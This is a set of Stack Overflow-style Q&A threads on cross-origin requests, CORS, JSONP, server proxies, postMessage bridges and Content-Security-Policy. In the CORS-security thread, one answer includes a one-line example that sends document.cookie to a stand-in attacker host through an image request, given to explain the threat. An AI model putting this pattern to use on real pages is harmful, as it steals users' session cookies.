Using a client's IP to get content - javascript

I'm a bit embarrassed here because I am trying to get content remotely by using the client's browser and not the server. But I have specifications which make it look impossible to me; I literally spent all day on it with no success.
The data I need to fetch is on a distant server.
I don't own this server (I can't do any modification to it).
It's a string, and I need to get it and pass it to PHP.
It must be the client's browser (the user browsing the website) that actually gets the data (it needs to be its IP, not the server's).
And, with the cross-domain policy, I don't seem to be able to get around it. I already knew about it, and still tried a simple Ajax query, which failed. Then I thought 'why not use iframes', but the same limitation seems to apply to them too. I then read about using YQL (http://developer.yahoo.com/yql/) but I noticed the server I was trying to reach blocked YQL's user agent, making it impossible to use this technique.
So, that's all I could think about or find. But I can't believe it's not possible to achieve such a thing, that doesn't even look hard...
Oh, and my JavaScript knowledge is very basic, which doesn't help either.

This is one reason that the same-origin policy exists. You're trying to have your webpage access data on a different server, without the user knowing, and without having "permission" from the other server to do so.
Without establishing a two-way trust system (i.e. modifying the 'other' server), I believe this is not possible.
Even with the newer XHR and cross-domain (CORS) support, two-way trust is still required for the communication to work.
You could consider a fat-client approach, or try @selbie's suggestion and require manual user interaction.

The same origin policy prevents document or script loaded from one origin from getting or setting properties of a document from a different origin.
-- From http://www.mozilla.org/projects/security/components/same-origin.html
Now if you wish to do some hackery to get it... visit this site
Note: I have never tried any of the methods on the aforementioned site and cannot guarantee their success

I can only see a really ugly solution: iframes. This article contains some good information to start with.

You could do it with:
- a Flash application plus a crossdomain.xml file (that won't help here, though, since you don't control the other server);
- on newer browsers, CORS, which requires the Access-Control-Allow-Origin header to be set on the server side (a sketch of the client-side request follows below);
- JSONP (but I think that won't work either, since you don't own the other server).
I think you need to bite the bullet and find some other way to get the content (on the server side for example).
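To illustrate the CORS option above, here is a minimal sketch with a made-up URL. The request is made by the visitor's browser (so it comes from the visitor's IP, as the question requires), but the browser only exposes the response to your script if the remote server sends a matching Access-Control-Allow-Origin header, which in this scenario it does not.
// Hypothetical cross-origin request; it only works if the remote server opts in via CORS.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://other-server.example/data.txt', true);
xhr.onreadystatechange = function () {
  if (xhr.readyState !== 4) return;
  if (xhr.status === 200) {
    // e.g. forward the string to your own PHP script from here
    console.log('Got: ' + xhr.responseText);
  } else {
    // same-origin violations typically surface as status 0
    console.log('Blocked or failed (status ' + xhr.status + ')');
  }
};
xhr.send();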

Relax Same Origin Rule for Javascript Widget (deprecated google finance backfill data)

Background:
I have a small javascript-powered widget that uses data from another origin. I tested it successfully in my local IDE using external (non-origin) data from:
https://www.google.com/finance/getprices?q=.NSEI&x=NSE&i=600&p=1d&f=d,o,h,l,c,v
When I uploaded this widget to my WordPress site I got the error:
SEC7120: Origin http://www.my-wordpress-site.com not found in
Access-Control-Allow-Origin header.
Which in turn made my calls to the data return something like this:
SCRIPT5007: Unable to get property 'split' of undefined or null reference
Disclaimer:
I know that Google Finance has long since been deprecated, but my understanding is that the servers were left running, which means the data is still there. Google clearly states that using the data for consumption violates the terms of usage for this data. What I am building is not an API or anything consumption-related; it's merely a front-end widget serving strictly as aesthetic ornamentation. I just want it to make the site look cooler by plotting some finance data.
Nonetheless, I'm not sure whether Google is refusing to let me fetch the data because it doesn't recognize my website. Maybe I have misunderstood the terms of use (I don't think I have, but who knows). I'm hoping it's a small protocol-type fix where I add a few lines and everything is happily ever after. Alternatively, if it is indeed the other way around, I don't have any control over which domains Google trusts, and I don't imagine contacting Google and saying "hey Google, don't leave my website out in the cold" would work.
Question: How do I relax the same origin rule? A few similar questions have been asked on Stack Overflow for C#, but I still wonder how to do this for my WordPress JavaScript widget. Can JavaScript alone do it?
I see a lot of examples having:
header("Access-Control-Allow-Origin: http://mozilla.com");
I don't know what language that is. I'm guessing PHP or C#. I don't know anything about those languages. I just want to design my widgets without having to learn a billion things about back-end protocols. I'm prepared to put in some effort, though.
Clarification
I have made widgets this way before (pointing an iframe at my widget's HTML, which lives on my cPanel server where WordPress is installed, under wp-content/uploads/2018/03) and had no trouble at all. This time around I'm getting the origin errors noted above. The only difference is that now I'm using some external data from a Google server. Maybe it's Google that doesn't recognize my site? The widget worked perfectly offline in my IDE. I'm not sure how to proceed, or whether WordPress has anything that helps widget designers like myself in these situations, or if it's another matter altogether.
Error result confirmed in the following browsers:
Edge
Chrome
The issue is fairly straightforward. Browsers enforce the Same Origin Policy, which prevents sites from accessing data fetched from a foreign domain. CORS is a protocol that servers can use to instruct browsers to allow foreign domains to read their data.
Public APIs that are intended to be used in a browser context will generally use CORS to make this possible. For whatever reason, Google does not seem to be using CORS to allow public access to this API. In particular, their response does not include the appropriate Access-Control-Allow-Origin header (part of the CORS protocol) to allow Javascript from your site to read the data. There is really nothing you can do about that.
The standard workaround is to proxy the data. That is, instead of having your code use the API directly, it would instead hit a URL on your server, which would then fetch the requested data from Google and return it. The server will be able to read the data because the Same Origin Policy (being a browser concern) won't apply. And your Javascript will be able to read the result since the request was made to the same domain.
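For illustration, here is a minimal sketch of such a proxy written with Node's built-in modules (a WordPress/cPanel host would more likely use a small PHP script instead); the /finance-proxy path is made up.
// Minimal proxy sketch: the widget calls /finance-proxy on your own domain,
// and this server fetches the Google URL itself, where the Same Origin Policy
// does not apply, then relays the body back.
var http = require('http');
var https = require('https');

var TARGET = 'https://www.google.com/finance/getprices' +
             '?q=.NSEI&x=NSE&i=600&p=1d&f=d,o,h,l,c,v';

http.createServer(function (req, res) {
  if (req.url !== '/finance-proxy') {
    res.writeHead(404);
    return res.end();
  }
  https.get(TARGET, function (upstream) {
    var body = '';
    upstream.on('data', function (chunk) { body += chunk; });
    upstream.on('end', function () {
      // The widget now talks to its own origin, so no CORS header is strictly
      // needed; one is added anyway in case the widget lives on a subdomain.
      res.writeHead(200, {
        'Content-Type': 'text/plain',
        'Access-Control-Allow-Origin': '*'
      });
      res.end(body);
    });
  }).on('error', function () {
    res.writeHead(502);
    res.end('Upstream request failed');
  });
}).listen(8080);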
If there are ways to get around the Same Origin Policy in the browser, I'm not familiar with them.

Lightest single page scraper

There is a website that publishes some ever-changing data. There is no API, but I need to access that value programmatically in JS. This is a common problem for me.
I am writing a simple JS script (a hacky API); HTML/JS on the client side is enough for any manipulation I want to do on the data.
But the problem is XMLHttpRequest and cross-server permissions. I do not want to introduce server-side elements just for this. Is there a workaround, considering I just want a typical HTML response?
CORS restrictions are enforced by browsers explicitly to prevent this kind of script (as well as more malicious XSS scripts); whoever is running that site is providing those resources (and paying to serve them up), so unless they're offering a public API it's not really fair to use that data in the way you seem to be trying to do. In this particular case it seems to be directly in conflict with the site's terms of service.

BasicAuth enabled CORS requests on IE8/9

So, this happened. Quick bullet point list of facts:
I have a HAL backend that lives on a different subdomain but (thankfully for IE10 support) in the same domain as my web app.
I need POST and GET requests made.
I do not need support for IE7 or less.
I NEED support for IE8 and up.
The way the API is built, I need to both send custom headers and be able to access the response headers. One of them is the basicAuth headers, but there may be more (like Location response headers and whatnot).
I am well aware of the limitations of the XDomainRequest object.
I have full control of both the API and the web app servers, code and everything in between. Yet, we believe the API is well built and shouldn't change because of one browser's poor implementation, so we'd like to keep changes to it at a minimum.
So that's how things are going. So far, I've checked a few alternatives that do not work. Here's a list of them and why they wouldn't help in this case:
- JSONP: it only allows GET requests.
- easyXDM: it does not allow custom headers to be sent.
- OpenAjax Hub: the documentation seemed confusing and scarce, but it seems to have no support for custom headers either.
So here's the question: is there any solution I am missing? My only hope right now is to build a custom SWF and override jQuery's $.ajax function to use it as a transport, but I'm unsure whether it'll work. In theory, it should. In practice... well, that's another matter entirely. So before delving into the depths of SWF hell, I thought I might ask whether anyone has faced this problem before and has any form of advice.
What you're missing is an embedded iframe whose src lives on the other (sub)domain, plus window.postMessage to go back and forth between the two windows: the embedded iframe does all of the XHR against its own origin and then posts back a custom-wrapped response with all of the headers/data you would typically get from CORS.
You'll then have your IE8/9 support.
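A rough sketch of that pattern follows, with placeholder origins and file names (app.example.com for the web app, api.example.com for the API, proxy.html as the helper page). IE8/9 support postMessage between frames, but only with string payloads, hence the JSON round-trip (IE8 has native JSON in standards mode; otherwise include json2.js).
// --- parent page on https://app.example.com ---
function onReply(event) {
  event = event || window.event;
  if (event.origin !== 'https://api.example.com') return;   // trust only the API origin
  var reply = JSON.parse(event.data);                        // { status, headers, body }
  console.log(reply.status, reply.headers.Location, reply.body);
}
if (window.addEventListener) window.addEventListener('message', onReply, false);
else window.attachEvent('onmessage', onReply);               // IE8

var frame = document.createElement('iframe');
frame.style.display = 'none';
frame.onload = function () {
  // ask the hidden iframe to perform a request on our behalf
  frame.contentWindow.postMessage(JSON.stringify({
    method: 'POST',
    path: '/orders',
    headers: { 'Authorization': 'Basic <base64 credentials>' },  // placeholder
    body: '{"item": 42}'
  }), 'https://api.example.com');
};
frame.src = 'https://api.example.com/proxy.html';
document.body.appendChild(frame);

// --- proxy.html, served from https://api.example.com ---
function onRequest(event) {
  event = event || window.event;
  if (event.origin !== 'https://app.example.com') return;     // only serve the web app
  var source = event.source, origin = event.origin;            // capture for the async reply
  var req = JSON.parse(event.data);
  var xhr = new XMLHttpRequest();                              // plain same-origin XHR, fine in IE8/9
  xhr.open(req.method, req.path, true);
  for (var name in req.headers) xhr.setRequestHeader(name, req.headers[name]);
  xhr.onreadystatechange = function () {
    if (xhr.readyState !== 4) return;
    source.postMessage(JSON.stringify({
      status: xhr.status,
      headers: { Location: xhr.getResponseHeader('Location') },
      body: xhr.responseText
    }), origin);
  };
  xhr.send(req.body || null);
}
if (window.addEventListener) window.addEventListener('message', onRequest, false);
else window.attachEvent('onmessage', onRequest);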

Have someone modify javascript code without write access

I would like to test out some interviewees by having them write some JavaScript that will make requests against my server. I don't want to give them write access to my code base. JavaScript runs on the client side, so this should technically be possible. However, I know there are browser restrictions that say the JavaScript has to come from the server?
I apologize that this is a really dumb question, but how should I proceed?
Edit:::
Ok, so I failed to mention that the entire application is based off sending JSON objects to and from the server.
I think you're thinking of the JavaScript XMLHttpRequest object itself, in which case, yes, the current standard is for browsers to block cross-domain calls. So you can tell them to pretend they either have a separate proxy script on their own personal domain which lets them reach yours, or that they're building a page served directly from your domain. There's talk of browsers supporting trust certificates or honoring special setups between source and target servers, but nothing universally accepted AFAIK.
JavaScript source itself does not need to come from the server, and in fact this is how you can get around this little XMLHttpRequest block: by using JSONP. Here's a simple JSON tutorial I just dug up from Yahoo. But this calls for your server to provide a JSONP-style feed if your server is the intended target.
"there are browser restrictions that say that the javascript has to come from the server"
I'm not aware of any situation where that's the case, only a lack of a console. But...even in those cases there's the address bar and javascript:.
If I misunderstood and you're talking about cross-domain restrictions, then your server needs to support JSONP for the requests so they can make cross-domain calls for data.
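For reference, the candidate's side of JSONP is just an injected script tag. A minimal sketch, assuming your server exposes a hypothetical /api/scores endpoint that honors a callback query parameter:
// JSONP sketch: the server is expected to respond with a script body such as
//   handleScores({"top": 42});
function handleScores(data) {          // globally visible callback the server will invoke
  console.log('Received:', data);
}
var s = document.createElement('script');
// absolute URL, since the candidate's page is served from a different origin
s.src = 'https://interviewer-server.example/api/scores?callback=handleScores';
document.getElementsByTagName('head')[0].appendChild(s);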
You could POST the JavaScript to your server, and then your server can send back some HTML that has the JavaScript inlined. Sounds like you're trying to set up something that is, more or less, a homebrew version of http://jsfiddle.net/; AFAIK, jsfiddle just does a "POST JavaScript/CSS/HTML and return HTML".

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
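To make that concrete, a single line of script is enough to leak data with no XHR or CORS involved at all (the collection URL is hypothetical):
// Illustration only: any script already running on the page can encode data it can
// read into the URL of an ordinary resource request, which has always been allowed
// cross-origin.
new Image().src = 'https://attacker.example/collect?d=' + encodeURIComponent(document.cookie);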
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy on other tags (script/img) stricter, while more secure, would break a lot of existing code and make it much more difficult to adopt the new technology. Hopefully something will be done to close that security hole, but I think they need to make sure it's an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
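For example, a response header along these lines (the domains are placeholders) blocks inline scripts, restricts where scripts may be loaded from, and limits which hosts XHR/fetch calls may contact:
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; connect-src 'self' https://api.example.com
Any attempt by injected script to contact a host outside that list is then refused by the browser itself.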
The problem isn't that a site can access another site's resources that it already had access to. The problem is one of domain: if I'm using a browser at my company, and an Ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution is CORS. I'm not saying it's the best, but it solves this issue.
1) If the gateway can't return the 'bobthehacker.com' accepted-origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the simple CORS case it will, by default, actually still return the results; you can configure the server to not even do that. Either way, the results are discarded by the browser without being exposed to the page.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note: the Origin header and the OPTIONS preflight request are controlled by the requester; obviously someone crafting their own HTTP request can put whatever they want in there. However, a modern CORS-compliant browser won't do that. It is the browser that controls the interaction, and the browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
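To illustrate points 1 and 2, this is roughly what the server-side check amounts to; a minimal Node.js sketch with placeholder origins (real deployments usually rely on their web server's or framework's CORS configuration instead):
// The server echoes Access-Control-Allow-Origin only for origins it trusts.
var http = require('http');
var TRUSTED = { 'https://myinternaldomain.com': true };

http.createServer(function (req, res) {
  var origin = req.headers.origin;      // filled in by the browser, e.g. http://bobthehacker.com
  if (origin && TRUSTED[origin]) {
    res.setHeader('Access-Control-Allow-Origin', origin);
  }
  // If the header is missing from the response (untrusted origin, or an old server
  // that never sends it), a CORS-compliant browser refuses to expose the body to
  // the calling page.
  res.end('{"secret": "internal gateway data"}');
}).listen(8080);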
I share David's concerns.
Security must be built layer by layer, and a whitelist served by the origin server seems to be a good approach.
Plus, this whitelist could be used to close the existing loopholes (forms, the script tag, etc.); it's safe to assume that a server serving such a whitelist is designed to avoid backwards-compatibility issues.
